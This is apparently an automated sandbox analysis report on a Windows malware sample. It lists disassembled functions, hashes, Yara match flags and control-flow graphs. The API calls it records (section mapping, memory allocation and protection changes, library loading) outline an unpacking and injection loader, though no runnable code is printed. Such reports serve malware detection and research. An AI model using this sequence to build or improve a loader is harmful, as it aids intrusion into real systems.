                                                                                                                                        • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                                                                        • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                                        • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F
                                                                                                                                        Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 368 4018d7 365->368 369 4018ce-4018e3 call 401193 365->369 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 368->369 379->378
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1885482327-0
                                                                                                                                        • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                                        • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                                                                        • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                                        • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F
                                                                                                                                        Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1885482327-0
                                                                                                                                        • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                                        • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                                                                        • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                                        • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                                                                                                        Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1885482327-0
                                                                                                                                        • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                                        • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                                                                        • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                                        • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                                                                                        Function 005035D8 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 444 5035d8-503612 call 5038eb 447 503660 444->447 448 503614-503647 VirtualAlloc call 503665 444->448 447->447 450 50364c-50365e 448->450 450->447
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00503629
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1726254840.00000000004F1000.00000040.00000020.00020000.00000000.sdmp, Offset: 004F1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_4f1000_ctMI3TYXpX.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction ID: d402faf0347471fe938d492c27253e8d69b2b457deff7dcb84c1c4b11a66b9a1
                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction Fuzzy Hash: 7D112D79A00208EFDB01DF98C985E98BFF5AF08350F0580A4F9489B361D371EA50DB80
                                                                                                                                        Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1885482327-0
                                                                                                                                        • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                                        • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                                                                        • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                                        • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 004B092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1726159167.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_4b0000_ctMI3TYXpX.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: .$GetProcAddress.$l
                                                                                                                                        • API String ID: 0-2784972518
                                                                                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                        • Instruction ID: 98458f537895f65fa26e3601b2473efc5ebda3c16de972de01baa121a5454400
                                                                                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                        • Instruction Fuzzy Hash: 703159B6900609DFDB10CF99C880AEEBBF9FF48325F24414AD841A7351D775EA45CBA8
                                                                                                                                        Function 004032C7 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: s
                                                                                                                                        • API String ID: 0-453955339
                                                                                                                                        • Opcode ID: d07de417770535d12de117b97f6c2128d54bdeaeab8d953c590c135d79241f8f
                                                                                                                                        • Instruction ID: 32084d28afe1afe84eccaa2aadec000ca1add1720bdf1548c052102d2181d3f0
                                                                                                                                        • Opcode Fuzzy Hash: d07de417770535d12de117b97f6c2128d54bdeaeab8d953c590c135d79241f8f
                                                                                                                                        • Instruction Fuzzy Hash: 5021226145CAD20FD7034B7808A89D57FF2ED1326170A41EBC080EB0A7DAA9890B8349
                                                                                                                                        Function 005031F6 Relevance: .1, Instructions: 61COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1726254840.00000000004F1000.00000040.00000020.00020000.00000000.sdmp, Offset: 004F1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_4f1000_ctMI3TYXpX.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                        • Instruction ID: d855e24e40c3ec07b6305a721ecb9cc5128eb739ce28e3423f863209cecf259f
                                                                                                                                        • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                        • Instruction Fuzzy Hash: 32117C76340101AFDB54DE59DC81EAA7BEAFB88320B298065ED05CB352E675E902C760
                                                                                                                                        Function 00403277 Relevance: .0, Instructions: 44COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                                                                                        • Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
                                                                                                                                        • Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                                                                                                                        • Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F
                                                                                                                                        Function 004B0D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1726159167.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004B0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_4b0000_ctMI3TYXpX.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                        • Instruction ID: 339e4f65f165143b3383d71b8c502fa653776667f3f249c0dba16b8d5d280db1
                                                                                                                                        • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                        • Instruction Fuzzy Hash: AF01A276A006048FDF21CF64C905BEB33E9FB86317F4545A6D90A97381E778A9418BA8
                                                                                                                                        Function 0040324F Relevance: .0, Instructions: 43COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                                                                                        • Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
                                                                                                                                        • Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                                                                                                                        • Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F
                                                                                                                                        Function 00403256 Relevance: .0, Instructions: 41COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                                                                                        • Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
                                                                                                                                        • Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                                                                                                                        • Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F
                                                                                                                                        Function 00403247 Relevance: .0, Instructions: 39COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                                                                                                        • Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
                                                                                                                                        • Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                                                                                                                        • Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F
                                                                                                                                        Function 0040326C Relevance: .0, Instructions: 34COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                                                                                        • Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
                                                                                                                                        • Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                                                                                                                        • Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF
                                                                                                                                        Function 00403290 Relevance: .0, Instructions: 31COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1725946356.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ctMI3TYXpX.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                                                                                                        • Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
                                                                                                                                        • Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                                                                                                                        • Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:9.9%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:0%
                                                                                                                                        Total number of Nodes:52
                                                                                                                                        Total number of Limit Nodes:2
                                                                                                                                        execution_graph 1061 592d99 1062 592da8 1061->1062 1063 593539 3 API calls 1062->1063 1064 592db1 1063->1064 1001 592d88 1002 592d91 1001->1002 1005 593539 1002->1005 1011 593554 1005->1011 1006 59355d CreateToolhelp32Snapshot 1007 593579 Module32First 1006->1007 1006->1011 1008 593588 1007->1008 1009 592db1 1007->1009 1012 5931f8 1008->1012 1011->1006 1011->1007 1013 593223 1012->1013 1014 59326c 1013->1014 1015 593234 VirtualAlloc 1013->1015 1014->1014 1015->1014 1035 530001 1036 530005 1035->1036 1041 53092b GetPEB 1036->1041 1038 530030 1043 53003c 1038->1043 1042 530972 1041->1042 1042->1038 1044 530049 1043->1044 1045 530e0f 2 API calls 1044->1045 1046 530223 1045->1046 1047 530d90 GetPEB 1046->1047 1048 530238 VirtualAlloc 1047->1048 1049 530265 1048->1049 1050 5302ce VirtualProtect 1049->1050 1052 53030b 1050->1052 1051 530439 VirtualFree 1055 5304be LoadLibraryA 1051->1055 1052->1051 1054 5308c7 1055->1054 1056 530005 1057 53092b GetPEB 1056->1057 1058 530030 1057->1058 1059 53003c 7 API calls 1058->1059 1060 530038 1059->1060 1016 53003c 1017 530049 1016->1017 1029 530e0f SetErrorMode SetErrorMode 1017->1029 1022 530265 1023 5302ce VirtualProtect 1022->1023 1025 53030b 1023->1025 1024 530439 VirtualFree 1028 5304be LoadLibraryA 1024->1028 1025->1024 1027 5308c7 1028->1027 1030 530223 1029->1030 1031 530d90 1030->1031 1032 530dad 1031->1032 1033 530dbb GetPEB 1032->1033 1034 530238 VirtualAlloc 1032->1034 1033->1034 1034->1022

                                                                                                                                        Executed Functions

                                                                                                                                        Function 0053003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 53003c-530047 1 530049 0->1 2 53004c-530263 call 530a3f call 530e0f call 530d90 VirtualAlloc 0->2 1->2 17 530265-530289 call 530a69 2->17 18 53028b-530292 2->18 23 5302ce-5303c2 VirtualProtect call 530cce call 530ce7 17->23 20 5302a1-5302b0 18->20 22 5302b2-5302cc 20->22 20->23 22->20 29 5303d1-5303e0 23->29 30 5303e2-530437 call 530ce7 29->30 31 530439-5304b8 VirtualFree 29->31 30->29 33 5305f4-5305fe 31->33 34 5304be-5304cd 31->34 37 530604-53060d 33->37 38 53077f-530789 33->38 36 5304d3-5304dd 34->36 36->33 40 5304e3-530505 36->40 37->38 43 530613-530637 37->43 41 5307a6-5307b0 38->41 42 53078b-5307a3 38->42 52 530517-530520 40->52 53 530507-530515 40->53 44 5307b6-5307cb 41->44 45 53086e-5308be LoadLibraryA 41->45 42->41 46 53063e-530648 43->46 48 5307d2-5307d5 44->48 51 5308c7-5308f9 45->51 46->38 49 53064e-53065a 46->49 54 5307d7-5307e0 48->54 55 530824-530833 48->55 49->38 50 530660-53066a 49->50 56 53067a-530689 50->56 58 530902-53091d 51->58 59 5308fb-530901 51->59 60 530526-530547 52->60 53->60 61 5307e2 54->61 62 5307e4-530822 54->62 57 530839-53083c 55->57 63 530750-53077a 56->63 64 53068f-5306b2 56->64 57->45 65 53083e-530847 57->65 59->58 66 53054d-530550 60->66 61->55 62->48 63->46 69 5306b4-5306ed 64->69 70 5306ef-5306fc 64->70 71 53084b-53086c 65->71 72 530849 65->72 67 5305e0-5305ef 66->67 68 530556-53056b 66->68 67->36 74 53056f-53057a 68->74 75 53056d 68->75 69->70 76 53074b 70->76 77 5306fe-530748 70->77 71->57 72->45 78 53059b-5305bb 74->78 79 53057c-530599 74->79 75->67 76->56 77->76 84 5305bd-5305db 78->84 79->84 84->66
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0053024D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1976888383.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_530000_jghruer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID: cess$kernel32.dll
                                                                                                                                        • API String ID: 4275171209-1230238691
                                                                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                        • Instruction ID: dbbae28743631155f3db6bb32cb2d02d0cd49f0ed6f47c960f984cfc88bdb838
                                                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                        • Instruction Fuzzy Hash: 7C526874A01229DFDB64CF58C995BA8BBB1BF09304F1480D9E90DAB391DB30AE95DF14
                                                                                                                                        Function 00593539 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 85 593539-593552 86 593554-593556 85->86 87 593558 86->87 88 59355d-593569 CreateToolhelp32Snapshot 86->88 87->88 89 593579-593586 Module32First 88->89 90 59356b-593571 88->90 91 593588-593589 call 5931f8 89->91 92 59358f-593597 89->92 90->89 95 593573-593577 90->95 96 59358e 91->96 95->86 95->89 96->92
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00593561
                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 00593581
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1977011876.0000000000581000.00000040.00000020.00020000.00000000.sdmp, Offset: 00581000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_581000_jghruer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction ID: fb25cf28a47df7d8de963588b828c7e0e867f236cb339ae55f71129d46a350a8
                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction Fuzzy Hash: 54F0C232500314ABDB202AB8A88DA6A7BE8BF4D320F140528F646910C0CA70EE454660
                                                                                                                                        Function 00530E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 98 530e0f-530e24 SetErrorMode * 2 99 530e26 98->99 100 530e2b-530e2c 98->100 99->100
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,00530223,?,?), ref: 00530E19
                                                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,00530223,?,?), ref: 00530E1E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1976888383.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_530000_jghruer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                        • Instruction ID: 744b544679e81edac46ace1a1040a10e47f9b2819e4d35e23ba8ce53e105023a
                                                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                        • Instruction Fuzzy Hash: BDD0123124522877D7003A94DC09BCD7F1CDF05B62F008411FB0DD9080C770994046E5
                                                                                                                                        Function 005931F8 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 101 5931f8-593232 call 59350b 104 593280 101->104 105 593234-593267 VirtualAlloc call 593285 101->105 104->104 107 59326c-59327e 105->107 107->104
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00593249
